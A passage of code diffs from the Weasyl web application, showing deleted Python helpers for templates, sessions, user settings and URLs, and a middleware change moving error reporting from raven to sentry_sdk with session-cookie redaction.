e.orig.pgcode != _PG_SERIALIZATION_FAILURE: - raise - - -with open(os.path.join(macro.MACRO_APP_ROOT, "version.txt")) as f: - CURRENT_SHA = f.read().strip() - - -# Caching all templates. Parsing templates is slow; we don't need to do it all -# the time and there's plenty of memory for storing the compiled templates. -_template_cache = {} - - -def _compile(template_name): - """ - Compiles a template file and returns the result. - """ - template = _template_cache.get(template_name) - - if template is None or reload_templates: - _template_cache[template_name] = template = Template( - pkgutil.get_data(__name__, 'templates/' + template_name).decode('utf-8'), - filename=template_name, - globals={ - "STR": str, - "LOGIN": get_sysname, - "TOKEN": get_token, - "CSRF": _get_csrf_input, - "USER_TYPE": user_type, - "DATE": convert_date, - "ISO8601_DATE": iso8601_date, - "TIME": _convert_time, - "LOCAL_ARROW": local_arrow, - "PRICE": text_price_amount, - "SYMBOL": text_price_symbol, - "TITLE": titlebar, - "RENDER": render, - "COMPILE": _compile, - "MARKDOWN": text.markdown, - "MARKDOWN_EXCERPT": text.markdown_excerpt, - "SUMMARIZE": summarize, - "SHA": CURRENT_SHA, - "NOW": get_time, - "THUMB": thumb_for_sub, - "WEBP_THUMB": webp_thumb_for_sub, - "M": macro, - "R": ratings, - "SLUG": text.slug_for, - "QUERY_STRING": query_string, - "INLINE_JSON": html.inline_json, - "PATH": _get_path, - "arrow": arrow, - "constants": libweasyl.constants, - "getattr": getattr, - "json": json, - "sorted": sorted, - "staff": staff, - "resource_path": get_resource_path, - }) - - return template - - -def render(template_name, argv=()): - """ - Renders a template and returns the resulting HTML. - """ - template = _compile(template_name) - return str(template(*argv)) - - -def titlebar(title, backtext=None, backlink=None): - return render("common/stage_title.html", [title, backtext, backlink]) - - -def errorpage_html(userid, message_html, links=None, request_id=None, **extras): - return webpage(userid, "error/error.html", [message_html, links, request_id], **extras) - - -def errorpage(userid, code=None, links=None, request_id=None, **extras): - if code is None: - code = errorcode.unexpected - - return errorpage_html(userid, text.markdown(code), links, request_id, **extras) - - -def webpage(userid, template, argv=None, options=None, **extras): - if argv is None: - argv = [] - - if options is None: - options = [] - - page = common_page_start(userid, options=options, **extras) - page.append(render(template, argv)) - - return common_page_end(userid, page, options=options) - - -def get_weasyl_session(): - """ - Gets the weasyl_session for the current request. Most code shouldn't have to use this. - """ - # TODO: This method is inelegant. Remove this logic after updating login.signin(). - return get_current_request().weasyl_session - - -def get_userid(): - """ - Returns the userid corresponding to the current request, if any. - """ - return get_current_request().userid - - -def is_csrf_valid(request, token): - expected = request.weasyl_session.csrf_token - return expected is not None and hmac.compare_digest(str(token), str(expected)) - - -def get_token(): - from weasyl import api - - request = get_current_request() - - if api.is_api_user(request): - return '' - - # allow error pages with $:{TOKEN()} in the template to be rendered even - # when the error occurred before the session middleware set a session - if not hasattr(request, 'weasyl_session'): - return security.generate_key(20) - - sess = request.weasyl_session - if sess.csrf_token is None: - sess.csrf_token = security.generate_key(64) - sess.save = True - return sess.csrf_token - - -def _get_csrf_input(): - return '' % (get_token(),) - - -@region.cache_on_arguments(namespace='v3') -def _get_all_config(userid): - """ - Queries for, and returns, common user configuration settings. - - :param userid: The userid to query. - :return: A dict(), containing the following keys/values: - is_banned: Boolean. Is the user currently banned? - is_suspended: Boolean. Is the user currently suspended? - is_vouched_for: Boolean. Is the user vouched for? - profile_configuration: CharSettings/string. Configuration options in the profile. - jsonb_settings: JSON/dict. Profile settings set via jsonb_settings. - """ - row = engine.execute(""" - SELECT EXISTS (SELECT FROM permaban WHERE permaban.userid = %(userid)s) AS is_banned, - EXISTS (SELECT FROM suspension WHERE suspension.userid = %(userid)s) AS is_suspended, - lo.voucher IS NOT NULL AS is_vouched_for, - pr.config AS profile_configuration, - pr.jsonb_settings - FROM login lo INNER JOIN profile pr USING (userid) - WHERE userid = %(userid)s - """, userid=userid).first() - - return dict(row) - - -def get_config(userid): - """ Gets user configuration from the profile table (profile.config)""" - if not userid: - return "" - return _get_all_config(userid)['profile_configuration'] - - -def get_login_settings(userid): - """ Returns a Boolean pair in the form of (is_banned, is_suspended)""" - r = _get_all_config(userid) - return r['is_banned'], r['is_suspended'] - - -def is_vouched_for(userid): - return _get_all_config(userid)['is_vouched_for'] - - -def get_profile_settings(userid): - from weasyl.profile import ProfileSettings - - if not userid: - jsonb = {} - else: - jsonb = _get_all_config(userid)['jsonb_settings'] - - if jsonb is None: - jsonb = {} - - return ProfileSettings(jsonb) - - -def get_rating(userid): - if not userid: - return ratings.GENERAL.code - - if is_sfw_mode(): - profile_settings = get_profile_settings(userid) - - # if no explicit max SFW rating picked assume general as a safe default - return profile_settings.max_sfw_rating - - config = get_config(userid) - if 'p' in config: - return ratings.EXPLICIT.code - elif 'a' in config: - return ratings.MATURE.code - else: - return ratings.GENERAL.code - - -# this method is used specifically for the settings page, where -# the max sfw/nsfw rating need to be displayed separately -def get_config_rating(userid): - """ - Retrieve the sfw-mode and regular-mode ratings separately - :param userid: the user to retrieve ratings for - :return: a tuple of (max_rating, max_sfw_rating) - """ - config = get_config(userid) - - if 'p' in config: - max_rating = ratings.EXPLICIT.code - elif 'a' in config: - max_rating = ratings.MATURE.code - else: - max_rating = ratings.GENERAL.code - - profile_settings = get_profile_settings(userid) - sfw_rating = profile_settings.max_sfw_rating - return max_rating, sfw_rating - - -def is_sfw_mode(): - """ - determine whether the current session is in SFW mode - :return: TRUE if sfw or FALSE if nsfw - """ - return get_current_request().cookies.get('sfwmode', "nsfw") == "sfw" - - -def get_premium(userid): - if not userid: - return False - - config = get_config(userid) - return "d" in config - - -@region.cache_on_arguments() -@record_timing -def _get_display_name(userid): - """ - Return the display name assiciated with `userid`; if no such user exists, - return None. - """ - return engine.scalar("SELECT username FROM profile WHERE userid = %(user)s", user=userid) - - -def get_display_name(userid): - if not userid: - return None - return _get_display_name(userid) - - -def get_int(target): - if target is None: - return 0 - - if isinstance(target, numbers.Number): - return int(target) - - try: - return int("".join(i for i in target if i.isdigit())) - except ValueError: - return 0 - - -def get_targetid(*argv): - for i in argv: - if i: - return i - - -def get_search_tag(target): - target = "".join(i for i in target if ord(i) < 128) - target = target.replace(" ", "_") - target = "".join(i for i in target if i.isalnum() or i in "_") - target = target.strip("_") - target = "_".join(i for i in target.split("_") if i) - - return target.lower() - - -def get_time(): - """ - Returns the current unixtime. - """ - return int(time.time()) + _UNIXTIME_OFFSET - - -def get_timestamp(): - """ - Returns the current date in the format YYYY-MM. - """ - return time.strftime("%Y-%m", time.localtime(get_time())) - - -def _get_hash_path(charid): - id_hash = hashlib.sha1(b"%i" % (charid,)).hexdigest() - return "/".join([id_hash[i:i + 2] for i in range(0, 11, 2)]) + "/" - - -def get_character_directory(charid): - return macro.MACRO_SYS_CHAR_PATH + _get_hash_path(charid) - - -@region.cache_multi_on_arguments(should_cache_fn=bool) -def _get_userids(*sysnames): - result = engine.execute( - "SELECT login_name, userid FROM login WHERE login_name = ANY (%(names)s)" - " UNION ALL SELECT alias_name, userid FROM useralias WHERE alias_name = ANY (%(names)s)" - " UNION ALL SELECT login_name, userid FROM username_history WHERE active AND login_name = ANY (%(names)s)", - names=list(sysnames), - ) - - sysname_userid = dict(result.fetchall()) - - return [sysname_userid.get(sysname, 0) for sysname in sysnames] - - -def get_userids(usernames): - ret = {} - lookup_usernames = [] - sysnames = [] - - for username in usernames: - sysname = get_sysname(username) - - if sysname: - lookup_usernames.append(username) - sysnames.append(sysname) - else: - ret[username] = 0 - - ret.update(zip(lookup_usernames, _get_userids(*sysnames))) - - return ret - - -def get_userid_list(target): - usernames = target.split(";") - return [userid for userid in get_userids(usernames).values() if userid != 0] - - -def get_ownerid(submitid=None, charid=None, journalid=None): - if submitid: - return engine.scalar("SELECT userid FROM submission WHERE submitid = %(id)s", id=submitid) - if charid: - return engine.scalar("SELECT userid FROM character WHERE charid = %(id)s", id=charid) - if journalid: - return engine.scalar("SELECT userid FROM journal WHERE journalid = %(id)s", id=journalid) - - -def get_random_set(target, count): - """ - Returns the specified number of unique items chosen at random from the target - list. If more items are specified than the list contains, the full contents - of the list will be returned in a randomized order. - """ - return random.sample(target, min(count, len(target))) - - -def get_address(): - request = get_current_request() - return request.client_addr - - -def _get_path(): - return get_current_request().path_url - - -def text_price_amount(target): - return "%.2f" % (float(target) / 100.0) - - -def text_price_symbol(target): - from weasyl.commishinfo import CURRENCY_CHARMAP - for c in target: - if c in CURRENCY_CHARMAP: - return CURRENCY_CHARMAP[c].symbol - return CURRENCY_CHARMAP[''].symbol - - -def text_first_line(target, strip=False): - """ - Return the first line of text; if `strip` is True, return all but the first - line of text. - """ - first_line, _, rest = target.partition("\n") - - if strip: - return rest - else: - return first_line - - -def text_fix_url(target): - if target.startswith(("http://", "https://")): - return target - - return "http://" + target - - -def local_arrow(dt): - tz = get_current_request().weasyl_session.timezone - return arrow.Arrow.fromdatetime(tz.localtime(dt)) - - -def convert_to_localtime(target): - tz = get_current_request().weasyl_session.timezone - if isinstance(target, arrow.Arrow): - return tz.localtime(target.datetime) - elif isinstance(target, datetime.datetime): - return tz.localtime(target) - else: - target = int(get_time() if target is None else target) - _UNIXTIME_OFFSET - return tz.localtime_from_timestamp(target) - - -def convert_date(target=None): - """ - Returns the date in the format 1 January 1970. If no target is passed, the - current date is returned. - """ - dt = convert_to_localtime(target) - result = dt.strftime("%d %B %Y") - return result[1:] if result and result[0] == "0" else result - - -def iso8601_date(target): - """ - Converts a Weasyl timestamp to an ISO 8601 date (yyyy-mm-dd). - - NB: Target is offset by _UNIXTIME_OFFSET - - :param target: The target Weasyl timestamp to convert. - :return: An ISO 8601 string representing the date of `target`. - """ - date = datetime.datetime.utcfromtimestamp(target - _UNIXTIME_OFFSET) - return arrow.get(date).format("YYYY-MM-DD") - - -def _convert_time(target=None): - """ - Returns the time in the format 16:00:00. If no target is passed, the - current time is returned. - """ - dt = convert_to_localtime(target) - config = get_config(get_userid()) - if '2' in config: - return dt.strftime("%I:%M:%S %p %Z") - else: - return dt.strftime("%H:%M:%S %Z") - - -def convert_unixdate(day, month, year): - """ - Returns the unixtime corresponding to the beginning of the specified date; if - the date is not valid, None is returned. - """ - day, month, year = (get_int(i) for i in [day, month, year]) - - try: - ret = int(time.mktime(datetime.date(year, month, day).timetuple())) - except ValueError: - return None - # range of a postgres integer - if ret > 2147483647 or ret < -2147483648: - return None - return ret - - -def convert_age(target): - return (get_time() - target) // 31556926 - - -def age_in_years(birthdate): - """ - Determines an age in years based off of the given arrow.Arrow birthdate - and the current date. - """ - now = arrow.now() - is_upcoming = (now.month, now.day) < (birthdate.month, birthdate.day) - - return now.year - birthdate.year - int(is_upcoming) - - -def user_type(userid): - if userid in staff.DIRECTORS: - return "director" - if userid in staff.TECHNICAL: - return "tech" - if userid in staff.ADMINS: - return "admin" - if userid in staff.MODS: - return "mod" - if userid in staff.DEVELOPERS: - return "dev" - - return None - - -@region.cache_on_arguments(expiration_time=180) -@record_timing -def _page_header_info(userid): - messages = engine.scalar( - "SELECT COUNT(*) FROM message WHERE otherid = %(user)s AND settings ~ 'u'", user=userid) - result = [messages, 0, 0, 0, 0] - - counts = engine.execute( - """ - SELECT type / 1000 AS group, COUNT(*) AS count - FROM welcome - LEFT JOIN submission - ON welcome.targetid = submission.submitid - AND welcome.type BETWEEN 2000 AND 2999 - WHERE - welcome.userid = %(user)s - AND ( - submission.rating IS NULL - OR submission.rating <= %(rating)s - ) - GROUP BY "group" - """, user=userid, rating=get_rating(userid)) - - for group, count in counts: - result[5 - group] = count - - return result - - -def page_header_info(userid): - from weasyl import media - sfw = get_current_request().cookies.get('sfwmode', 'nsfw') - return { - "welcome": _page_header_info(userid), - "userid": userid, - "username": get_display_name(userid), - "user_media": media.get_user_media(userid), - "sfw": sfw, - } - - -def common_page_start(userid, options=None, **extended_options): - if options is None: - options = [] - - userdata = None - if userid: - userdata = page_header_info(userid) - - data = render( - "common/page_start.html", [userdata, options, extended_options]) - - return [data] - - -def common_page_end(userid, page, options=None): - data = render("common/page_end.html", (options,)) - page.append(data) - return "".join(page) - - -def common_status_check(userid): - """ - Returns the name of the script to which the user should be redirected - if required. - """ - if not userid: - return None - - is_banned, is_suspended = get_login_settings(userid) - - if is_banned: - return "banned" - if is_suspended: - return "suspended" - - return None - - -def common_status_page(userid, status): - """ - Raise the redirect to the script returned by common_status_check() or render - the appropriate site status error page. - """ - if status in ('banned', 'suspended'): - from weasyl import moderation, login - - login.signout(get_current_request()) - if status == 'banned': - reason = moderation.get_ban_reason(userid) - return errorpage( - userid, - "Your account has been permanently banned and you are no longer allowed " - "to sign in.\n\n%s\n\nIf you believe this ban is in error, please " - "contact %s for assistance." % (reason, MACRO_SUPPORT_ADDRESS)) - - elif status == 'suspended': - suspension = moderation.get_suspension(userid) - return errorpage( - userid, - "Your account has been temporarily suspended and you are not allowed to " - "be logged in at this time.\n\n%s\n\nThis suspension will be lifted on " - "%s.\n\nIf you believe this suspension is in error, please contact " - "%s for assistance." % (suspension.reason, convert_date(suspension.release), MACRO_SUPPORT_ADDRESS)) - - -_content_types = { - 'submit': 110, - 'char': 120, - 'journal': 130, - 'profile': 210, -} - - -def common_view_content(userid, targetid, feature): - """ - Return True if a record was successfully inserted into the views table - and the page view statistic incremented, else False. - """ - if feature == "profile" and targetid == userid: - return - - typeid = _content_types.get(feature, 0) - if userid: - viewer = 'user:%d' % (userid,) - else: - viewer = get_address() - - result = engine.execute( - 'INSERT INTO views (viewer, targetid, type) VALUES (%(viewer)s, %(targetid)s, %(type)s) ON CONFLICT DO NOTHING', - viewer=viewer, targetid=targetid, type=typeid) - - if result.rowcount == 0: - return False - - if feature == "submit": - engine.execute("UPDATE submission SET page_views = page_views + 1 WHERE submitid = %(id)s", id=targetid) - elif feature == "char": - engine.execute("UPDATE character SET page_views = page_views + 1 WHERE charid = %(id)s", id=targetid) - elif feature == "journal": - engine.execute("UPDATE journal SET page_views = page_views + 1 WHERE journalid = %(id)s", id=targetid) - elif feature == "profile": - engine.execute("UPDATE profile SET page_views = page_views + 1 WHERE userid = %(id)s", id=targetid) - - return True - - -def append_to_log(logname, **parameters): - parameters['when'] = datetime.datetime.now().isoformat() - log_path = '%s%s.%s.log' % (macro.MACRO_SYS_LOG_PATH, logname, get_timestamp()) - with open(log_path, 'a') as outfile: - outfile.write(json.dumps(parameters)) - outfile.write('\n') - - -_CHARACTER_SETTINGS_FEATURE_SYMBOLS = { - "char/thumb": "-", - "char/cover": "~", - "char/submit": "=", -} - -_CHARACTER_SETTINGS_TYPE_EXTENSIONS = { - "J": ".jpg", - "P": ".png", - "G": ".gif", - "T": ".txt", - "H": ".htm", - "M": ".mp3", - "F": ".swf", - "A": ".pdf", -} - - -def url_type(settings, feature): - """ - Return the file extension specified in `settings` for the passed feature. - """ - symbol = _CHARACTER_SETTINGS_FEATURE_SYMBOLS[feature] - type_code = settings[settings.index(symbol) + 1] - - return _CHARACTER_SETTINGS_TYPE_EXTENSIONS[type_code] - - -def url_make(targetid, feature, query=None, root=False, file_prefix=None): - """ - Return the URL to a resource; if `root` is True, the path will start from - the root. - """ - result = [] if root else ["/"] - - if root: - result.append(macro.MACRO_STORAGE_ROOT) - - if "char/" in feature: - result.extend([macro.MACRO_URL_CHAR_PATH, _get_hash_path(targetid)]) - - if file_prefix is not None: - result.append("%s-" % (file_prefix,)) - - # Character file - if feature == "char/submit": - if query is None: - query = engine.execute("SELECT userid, settings FROM character WHERE charid = %(id)s", id=targetid).first() - - if query and "=" in query[1]: - result.append("%i.submit.%i%s" % (targetid, query[0], url_type(query[1], feature))) - else: - return None - # Character cover - elif feature == "char/cover": - if query is None: - query = engine.execute("SELECT settings FROM character WHERE charid = %(id)s", id=targetid).first() - - if query and "~" in query[0]: - result.append("%i.cover%s" % (targetid, url_type(query[0], feature))) - else: - return None - # Character thumbnail - elif feature == "char/thumb": - if query is None: - query = engine.execute("SELECT settings FROM character WHERE charid = %(id)s", id=targetid).first() - - if query and "-" in query[0]: - result.append("%i.thumb%s" % (targetid, url_type(query[0], feature))) - else: - return None if root else get_resource_path("img/default-visual.png") - # Character thumbnail selection - elif feature == "char/.thumb": - result.append("%i.new.thumb" % (targetid,)) - - return "".join(result) - - -def cdnify_url(url): - cdn_root = config_read_setting("cdn_root") - if not cdn_root: - return url - - return urljoin(cdn_root, url) - - -def get_resource_path(resource): - if reload_assets: - _load_resources() - - return '/' + resource_paths[resource] - - -def get_resource_url(resource): - """ - Get a full URL for a resource. - - Useful for , for example. - """ - return 'https://www.weasyl.com' + get_resource_path(resource) - - -DEFAULT_SUBMISSION_THUMBNAIL = [ - dict.fromkeys( - ['display_url', 'file_url'], - get_resource_path('img/default-visual.png'), - ), -] - -DEFAULT_AVATAR = [ - dict.fromkeys( - ['display_url', 'file_url'], - get_resource_path('img/default-avatar.jpg'), - ), -] - - -def absolutify_url(url): - cdn_root = config_read_setting("cdn_root") - if cdn_root and url.startswith(cdn_root): - return url - - return urljoin(get_current_request().application_url, url) - - -def user_is_twitterbot(): - return get_current_request().environ.get('HTTP_USER_AGENT', '').startswith('Twitterbot') - - -def summarize(s, max_length=200): - if len(s) > max_length: - return s[:max_length - 1].rstrip() + u'\N{HORIZONTAL ELLIPSIS}' - return s - - -def clamp(val, lower_bound, upper_bound): - return min(max(val, lower_bound), upper_bound) - - -def timezones(): - ct = datetime.datetime.now(pytz.utc) - timezones_by_country = [ - (pytz.country_names[cc], [ - (int(ct.astimezone(pytz.timezone(tzname)).strftime("%z")), tzname) - for tzname in timezones - ]) - for cc, timezones in pytz.country_timezones.items()] - timezones_by_country.sort() - ret = [] - for country, timezones in timezones_by_country: - ret.append(('- %s -' % (country,), None)) - ret.extend( - ("[UTC%+05d] %s" % (offset, tzname.replace('_', ' ')), tzname) - for offset, tzname in timezones) - return ret - - -def query_string(query): - pairs = [] - - for key, value in query.items(): - if isinstance(value, (tuple, list, set)): - for subvalue in value: - pairs.append((key, subvalue)) - elif value: - pairs.append((key, value)) - - return urlencode(pairs) - - -def _requests_wrapper(func_name): - func = getattr(requests, func_name) - - def wrapper(*a, **kw): - try: - return func(*a, **kw) - except Exception as e: - capture_exception(e, level='info') - w = WeasylError('httpError') - w.error_suffix = 'The original error was: %s' % (e,) - raise w from e - - return wrapper - - -http_get = _requests_wrapper('get') -http_post = _requests_wrapper('post') - - -def metric(*a, **kw): - pass - - -def iso8601(unixtime): - if isinstance(unixtime, arrow.Arrow) or isinstance(unixtime, datetime.datetime): - return unixtime.isoformat().partition('.')[0] + 'Z' - else: - return datetime.datetime.utcfromtimestamp(unixtime - _UNIXTIME_OFFSET).isoformat() + 'Z' - - -def parse_iso8601(s): - return arrow.Arrow.strptime(s, '%Y-%m-%dT%H:%M:%SZ').timestamp + _UNIXTIME_OFFSET - - -def paginate(results, backid, nextid, limit, key): - at_start = at_end = False - # if neither value is specified, we're definitely at the start - if not backid and not nextid: - at_start = True - - # if we were cut short... - if len(results) <= limit: - if backid: - # if moving backward we're at the start - at_start = True - else: - # if moving forward we're at the end - at_end = True - elif backid: - # delete extraneous rows from the front if we're moving backward - del results[:-limit] - else: - # or from the back if we're moving forward - del results[limit:] - - return ( - None if at_start or not results else results[0][key], - None if at_end or not results else results[-1][key]) - - -def thumb_for_sub(submission): - """ - Given a submission dict containing sub_media, sub_type and userid, - returns the appropriate media item to use as a thumbnail. - - Params: - submission: The submission. - - Returns: - The sub media to use as a thumb. - """ - user_id = get_userid() - profile_settings = get_profile_settings(user_id) - if (profile_settings.disable_custom_thumbs and - submission.get('subtype', 9999) < 2000 and - submission['userid'] != user_id): - thumb_key = 'thumbnail-generated' - else: - thumb_key = 'thumbnail-custom' if 'thumbnail-custom' in submission['sub_media'] else 'thumbnail-generated' - - return submission['sub_media'][thumb_key][0] - - -def webp_thumb_for_sub(submission): - """ - Given a submission dict containing sub_media, sub_type and userid, - returns the appropriate WebP media item to use as a thumbnail. - - Params: - submission: The submission. - - Returns: - The sub media to use as a thumb, or None. - """ - user_id = get_userid() - profile_settings = get_profile_settings(user_id) - disable_custom_thumb = ( - profile_settings.disable_custom_thumbs and - submission.get('subtype', 9999) < 2000 and - submission['userid'] != user_id - ) - - if not disable_custom_thumb and 'thumbnail-custom' in submission['sub_media']: - return None - - thumbnail_generated_webp = submission['sub_media'].get('thumbnail-generated-webp') - return thumbnail_generated_webp and thumbnail_generated_webp[0] diff --git a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.diff b/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.diff deleted file mode 100644 index 9bace97..0000000 --- a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.diff +++ /dev/null @@ -1,203 +0,0 @@ -diff --git a/weasyl/middleware.py b/weasyl/middleware.py - index 97717e00368e9f650dd2daf3493ee76291dc5710..d10cb162447d9e3a9506b76054851863b10ff27a 100644 - --- a/weasyl/middleware.py - +++ b/weasyl/middleware.py -@@ -1,20 +1,15 @@ - import html --import os - import re --import sys -+import secrets - import time --import base64 --import logging --import raven --import raven.processors - import traceback - - from pyramid.httpexceptions import HTTPUnauthorized - from pyramid.response import Response - from pyramid.threadlocal import get_current_request -+from sentry_sdk import capture_exception, capture_message, push_scope, set_user - from sqlalchemy import event - from sqlalchemy.engine import Engine --from twisted.internet.threads import blockingCallFromThread - from web.utils import storify - - from libweasyl import staff -@@ -22,7 +17,6 @@ from libweasyl.cache import ThreadCacheProxy - from libweasyl.models.users import GuestSession - from weasyl import define as d - from weasyl import errorcode --from weasyl import http - from weasyl import orm - from weasyl.error import WeasylError - from weasyl.sessions import create_guest_session, is_guest_token -@@ -102,6 +96,10 @@ def session_tween_factory(handler, registry): - - request.weasyl_session = sess_obj - -+ set_user( -+ {"id": sess_obj.userid} if sess_obj.userid -+ else {"ip_address": request.client_addr}) -+ - # Register a response callback to set the session cookies before returning. - # Note that this requires that exceptions are handled properly by our exception view. - request.add_response_callback(callback) -@@ -260,14 +258,6 @@ def userid_request_property(request): - return 0 if userid is None else userid - - --def log_exc_request_method(request, **kwargs): -- """ -- Method on requests to log exceptions. -- """ -- # It's unclear to me why this should be a request method and not just define.log_exc(). -- return request.environ.get('raven.captureException', lambda **kw: traceback.print_exc())(**kwargs) -- -- - def web_input_request_method(request, *required, **kwargs): - """ - Callable that processes the pyramid request.params multidict into a web.py storage object -@@ -312,8 +302,7 @@ def weasyl_exception_view(exc, request): - A view for general exceptions thrown by weasyl code. - """ - if isinstance(exc, ClientGoneAway): -- if 'raven.captureMessage' in request.environ: -- request.environ['raven.captureMessage']('HTTP client went away', level=logging.INFO) -+ capture_message('HTTP client went away') - return request.response - else: - # Avoid using the reified request.userid property here. It might not be set and it might -@@ -336,10 +325,11 @@ def weasyl_exception_view(exc, request): - message = '%s %s' % (message, exc.error_suffix) - return Response(d.errorpage(userid, message, **errorpage_kwargs), - status_code=status_code) -- request_id = None -- if 'raven.captureException' in request.environ: -- request_id = base64.b64encode(os.urandom(6), b'+-').decode('ascii') -- event_id = request.environ['raven.captureException'](request_id=request_id) -+ request_id = secrets.token_urlsafe(6) -+ with push_scope() as scope: -+ scope.set_tag('request_id', request_id) -+ event_id = capture_exception(exc) -+ if event_id is not None: - request_id = '%s-%s' % (event_id, request_id) - print("unhandled error (request id %s) in %r" % (request_id, request.environ)) - traceback.print_exc() -@@ -349,39 +339,17 @@ def weasyl_exception_view(exc, request): - return Response(d.errorpage(userid, request_id=request_id, **errorpage_kwargs), status_code=500) - - --class RemoveSessionCookieProcessor(raven.processors.Processor): -- """ -- Removes Weasyl session cookies. -- """ -- def _filter_header(self, value): -- return re.sub( -- r'WZL=(\w+)', -- lambda match: 'WZL=' + '*' * len(match.group(1)), -- value) -- -- def filter_http(self, data): -- if 'cookies' in data: -- data['cookies'] = self._filter_header(data['cookies']) -- -- if 'headers' in data and 'Cookie' in data['headers']: -- data['headers']['Cookie'] = self._filter_header(data['headers']['Cookie']) -- -- env = data.get('env') -- -- if env is not None: -- if 'HTTP_COOKIE' in env: -- env['HTTP_COOKIE'] = self._filter_header(env['HTTP_COOKIE']) -- -- # WebOb cache, like: -- # - webob._parsed_query_vars -- # - webob._body_file -- # - webob._parsed_post_vars -- # - webob._parsed_cookies -- # These mostly just repeat information that can be found elsewhere, -- # so they’re removed rather than filtered. -- remove_keys = [key for key in env if key.startswith('webob._')] -- for key in remove_keys: -- del env[key] -+def strip_session_cookie(event, hint): -+ if request := event.get('request'): -+ if (headers := request.get('headers')) and 'Cookie' in headers: -+ headers['Cookie'] = re.sub( -+ r'(WZL="?)([^";]+)', -+ lambda match: match.group(1) + '*' * len(match.group(2)), -+ headers['Cookie'] -+ ) -+ if (cookies := request.get('cookies')) and 'WZL' in cookies: -+ cookies['WZL'] = '*' * len(cookies['WZL']) -+ return event - - - class URLSchemeFixingMiddleware(object): -@@ -394,64 +362,6 @@ class URLSchemeFixingMiddleware(object): - return self.app(environ, start_response) - - --class SentryEnvironmentMiddleware(object): -- def __init__(self, app, dsn, reactor=None): -- self.app = app -- self.client = raven.Client( -- dsn=dsn, -- release=d.CURRENT_SHA, -- processors=[ -- 'raven.processors.SanitizePasswordsProcessor', -- 'weasyl.middleware.RemoveSessionCookieProcessor', -- ], -- ) -- if reactor is None: -- from twisted.internet import reactor -- self.reactor = reactor -- -- def ravenCaptureArguments(self, level=None, **extra): -- request = get_current_request() -- data = { -- 'level': level, -- 'user': { -- 'id': d.get_userid(), -- 'ip_address': d.get_address(), -- }, -- 'request': { -- 'url': request.environ['PATH_INFO'], -- 'method': request.environ['REQUEST_METHOD'], -- 'data': request.POST, -- 'query_string': request.environ['QUERY_STRING'], -- 'headers': http.get_headers(request.environ), -- 'env': request.environ, -- }, -- } -- -- return { -- 'data': data, -- 'extra': dict( -- extra, -- session=getattr(request, 'weasyl_session', None), -- ), -- } -- -- def captureException(self, **extra): -- kwargs = self.ravenCaptureArguments(**extra) -- exc_info = sys.exc_info() -- return blockingCallFromThread( -- self.reactor, self.client.captureException, exc_info, **kwargs) -- -- def captureMessage(self, message, **extra): -- kwargs = self.ravenCaptureArguments(**extra) -- return blockingCallFromThread( -- self.reactor, self.client.captureMessage, message, **kwargs) -- -- def __call__(self, environ, start_response): -- environ['raven.captureException'] = self.captureException -- environ['raven.captureMessage'] = self.captureMessage -- return self.app(environ, start_response) -- -- - def _wrapperfunc(name): - def wrap(self, *a, **kw): - meth = getattr(self._wrapped, name) diff --git a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.source.py b/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.source.py deleted file mode 100644 index 4d19027..0000000 --- a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.source.py +++ /dev/null @@ -1,505 +0,0 @@ -import html -import os -import re -import sys -import time -import base64 -import logging -import raven -import raven.processors -import traceback - -from pyramid.httpexceptions import HTTPUnauthorized -from pyramid.response import Response -from pyramid.threadlocal import get_current_request -from sqlalchemy import event -from sqlalchemy.engine import Engine -from twisted.internet.threads import blockingCallFromThread -from web.utils import storify - -from libweasyl import staff -from libweasyl.cache import ThreadCacheProxy -from libweasyl.models.users import GuestSession -from weasyl import define as d -from weasyl import errorcode -from weasyl import http -from weasyl import orm -from weasyl.error import WeasylError -from weasyl.sessions import create_guest_session, is_guest_token - - -class ClientGoneAway(Exception): - pass - - -def cache_clear_tween_factory(handler, registry): - """ - A tween to clear the thread local cache. - """ - def cache_clear_tween(request): - try: - return handler(request) - finally: - ThreadCacheProxy.zap_cache() - return cache_clear_tween - - -def db_timer_tween_factory(handler, registry): - """ - A tween that records timing information in the headers of a response. - """ - def db_timer_tween(request): - started_at = time.perf_counter() - request.sql_times = [] - request.memcached_times = [] - resp = handler(request) - ended_at = time.perf_counter() - time_in_sql = sum(request.sql_times) - time_in_memcached = sum(request.memcached_times) - time_in_python = ended_at - started_at - time_in_sql - time_in_memcached - resp.headers['X-SQL-Time-Spent'] = '%0.1fms' % (time_in_sql * 1000,) - resp.headers['X-Memcached-Time-Spent'] = '%0.1fms' % (time_in_memcached * 1000,) - resp.headers['X-Python-Time-Spent'] = '%0.1fms' % (time_in_python * 1000,) - resp.headers['X-SQL-Queries'] = str(len(request.sql_times)) - resp.headers['X-Memcached-Queries'] = str(len(request.memcached_times)) - return resp - return db_timer_tween - - -def session_tween_factory(handler, registry): - """ - A tween that sets a weasyl_session on a request. - """ - def callback(request, response): - sess_obj = request.weasyl_session - - if isinstance(sess_obj, GuestSession): - if sess_obj.create: - response.set_cookie('WZL', sess_obj.sessionid, max_age=None, - secure=request.scheme == 'https', httponly=True) - elif sess_obj.save: - session = request.pg_connection - - if sess_obj.create: - session.add(sess_obj) - response.set_cookie('WZL', sess_obj.sessionid, max_age=60 * 60 * 24 * 365, - secure=request.scheme == 'https', httponly=True) - session.flush() - - # TODO(hyena): Investigate a pyramid session_factory implementation instead. - def session_tween(request): - sess_obj = None - cookie = request.cookies.get('WZL') - - if cookie is not None: - if is_guest_token(cookie): - sess_obj = GuestSession(cookie) - else: - sess_obj = request.pg_connection.query(orm.Session).get(cookie) - - if sess_obj is None: - sess_obj = create_guest_session() - - request.weasyl_session = sess_obj - - # Register a response callback to set the session cookies before returning. - # Note that this requires that exceptions are handled properly by our exception view. - request.add_response_callback(callback) - return handler(request) - - return session_tween - - -def query_debug_tween_factory(handler, registry): - """ - A tween that allows developers to view timing per query. - """ - def callback(request, response): - if not hasattr(request, 'weasyl_session') or request.weasyl_session.userid not in staff.DEVELOPERS: - return - - class ParameterCounter(object): - def __init__(self): - self.next = 1 - self.ids = {} - - def __getitem__(self, name): - id = self.ids.get(name) - - if id is None: - id = self.ids[name] = self.next - self.next += 1 - - return u'$%i' % (id,) - - debug_rows = [] - - for statement, t in request.query_debug: - statement = u' '.join(statement.split()).replace(u'( ', u'(').replace(u' 